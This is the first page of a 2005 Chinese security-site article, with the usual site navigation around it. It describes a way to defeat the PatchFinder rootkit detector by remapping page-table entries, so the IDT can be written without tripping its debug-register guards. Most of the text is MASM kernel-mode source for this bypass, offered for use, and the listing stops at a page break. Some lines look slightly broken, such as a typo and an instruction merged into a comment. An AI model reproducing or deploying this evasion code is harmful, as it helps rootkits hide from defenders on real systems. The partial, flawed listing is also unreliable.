网站首页站长博客下载中心域名交易站长论坛域名主机免费电邮免费域名中文排行排名查询站长书库书籍教程下载
设为首页
加入收藏
总编信箱
投稿或申请专栏请先 [登 陆]
学院首页 网络编程 网页设计 图形图象 数 据 库 服 务 器 网络媒体 网络安全 个人专栏 站长CLUB 业界新闻 信息公告
 当前位置:首页 >> 网络安全 >> 安全防范 >> 正文
公告通知
返回上级列表
资料搜索
相关文章
ASP访问SQL Server内置对象
网吧常见漏洞及利用方法
五大手段确保网络的安全
不要小看IIS的恶性杀手Unicode
SYN Flood攻击的基本原理
针对Win2000优化Web服务器性能
Linux服务器的攻防技术介绍
注意警惕DoS的路由器攻击
应对DoSDDoS攻击的十条军规
教你如何让win XP系统运行如飞一
绕过Windows Rootkit检测系统
[ 来源:中国站长学院 | 作者:郁郁小蝎 | 时间:2005-7-5 9:30:42 | 浏览:人次 ]
收藏到新浪ViVi 收藏到365KEY 收藏到我摘  字号选择〖    〗/ 双击滚屏 单击停止  
[介绍]


        PatchFinder是一个设计很巧妙的程序,基于EPA(执行路径分析)技术用来检测侵入内核的Rootkit。这篇文章将提供一种绕开EPA的方法。

[方法]

        EPA基于Intel处理器的单步模式,使用中断描述符表(IDT)的0x01入口。为了防止Rootkit修改这个入口,它使用调试寄存器(DR0、DR1)来保护调试处理程序(很不错的主意)。由DR0寄存器保护0x1入口,而由DR1寄存器保护中断处理程序。(注1:)
但是,让我们再读一遍Inter Manual [3]:“每个调试地址寄存器(DR0到DR3)保存32位的断点的线性地址”。注意:线性地址!在Windows 2000/XP下,通过分页机制把线性地址转换为物理地址。假设IDT的基地址是在0x8003F400,保存在IDTR中,那么IDT的0x01入口地址就是0x8003F408。Intel有关IDTR的说明:“基地址标明了IDT的0x00入口地址。”WIndows 2000/XP下由CR3寄存器指向的页目录被映射到线性地址0xC0300000。线性地址是由目录、表和偏移组成,通过分页机制我们将 0x8003F408转换为物理地址就是0x03F00(由实验中得来)。现在我们要做的就是创建一个缓冲区,获取指向缓冲区的指针并修改页目录和页表使这个缓冲区指向物理地址0x03F00。然后,向这个缓冲区中写入的东西就会写入IDT,并且不会触发PatchFinder的保护机制。调试寄存器是根本无法保护内存的,因为它们无法保护物理内存。

[源代码]

    这里是源代码,由MASM v8.0汇编。因为我喜欢汇编语言:-)完全的源代码可以在www.rootkit.com找到。

;---定义IDTR结构-------
DIDTR STRUCT ;IDTR
dLIMIT WORD ?
ibase DWORD ?
DIDTR ENDS
;-----------------------

ByepassIDTProtection PROC

LOCAL dbgHandler:DWORD

LOCAL myIDT:DIDTR

LOCAL idtbase:DWORD
LOCAL idtbaseoff:DWORD
LOCAL idtPDE:DWORD
LOCAL idtPDEaddr:DWORD
LOCAL idtPTE:DWORD
LOCAL idtPTEaddr:DWORD

LOCAL varbase:DWORD
LOCAL varbaseoff:DWORD
LOCAL varPDE:DWORD
LOCAL varPDEaddr:DWORD
LOCAL varPTE:DWORD
LOCAL varPTEaddr:DWORD

LOCAL diffoffset:DWORD

pushad

;分配一个页大小的内存(从非分页池中分配)
invoke ExAllocatePool,NonPagedPoolMustSucceed,01000h
mov varbase,eax

cli ;记得恢复

invoke DisablePageProtection ;对XP,Regmon使用的一个很老的技巧

sidt myIDT
mov eax,myIDT.ibase
add eax,08h
mov idtbase,eax ;idtbase = IDT的基地址 + 8字节

and eax,0FFC00000h ;获取IDT地址的目录索引
shr eax,22
shl eax,2 ;乘与4

mov ebx,0C0300000h ;0C0300000 = 页目录
add ebx,eax ;ebx = [页目录 + 目录索引*4]
mov idtPDEaddr,ebx

mov eax,[ebx]
mov idtPDE,eax ;eax = IDT地址的页目录入口(PDE)

mov eax,idtbase
and eax,oFFFh ;获取IDT地址的低12位 = 页内偏移 mov idtbaseoff,eax

mov eax,idtbase
shr eax,12 ;获取IDT地址的高12位
shl eax,2 ;乘与4

mov ebx,0C0000000h ;进程页表映射在0xC0000000开始的4MB空间中
add ebx,eax
mov idtPTEaddr,eax ;IDT地址的PTE的地址

mov eax,[ebx]
mov idtPTE,eax ;取该地址的PTE

mov eax,varbase

and eax,0FFC00000h ;获取varbase的页目录索引
shr eax,22
shl eax,2

mov ebx,0C0300000h
add ebx,eax
mov varPDEaddr,ebx

mov eax,[ebx]
mov varPDE,eax

mov eax,varbase
and eax,0FFFh
mov varbaseoff,eax

mov eax,varbase
shr eax,12
shl eax,2

mov ebx,0C0000000h
add ebx,eax
mov varPTEaddr,ebx

mov eax,[ebx]
mov varPTE,eax

mov eax,varPDEaddr ;修改PDE为和IDT0x01的一样
mov ebx,idtPDE
mov [eax],ebx

mov eax,varPTEaddr ;修改PTE为和IDT0x01的一样
mov ebx,idtPTE
mov [eax],ebx

mov ebx,idtbaseoff ;修正页内偏移
mov eax,varbaseoff
sub ebx,eax

本新闻共2页,当前在第1页  1  2  
[发送给好友]  [打印本页]  [关闭窗口]  [返回顶部]   转载请注明来源:http://edu.chinaz.com   
特别声明: 本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
栏目编辑: 设计风 责任编辑: 设计风
原始作者: 郁郁小蝎 录入时间: 2005-7-5 9:30:42
信息来源: 中国站长学院 投稿信箱: Edu#chinaz.com
设为首页 - 加入收藏 - 关于我们 - 广告服务 - 版权申明 - 友情链接 - 联系方式 - 总编信箱 - 会员投稿
© CopyRight 2005-2008 CHINAZ.COM.Inc All Rights Reserved
 
本站服务器空间和带宽由厦门柯特数据提供赞助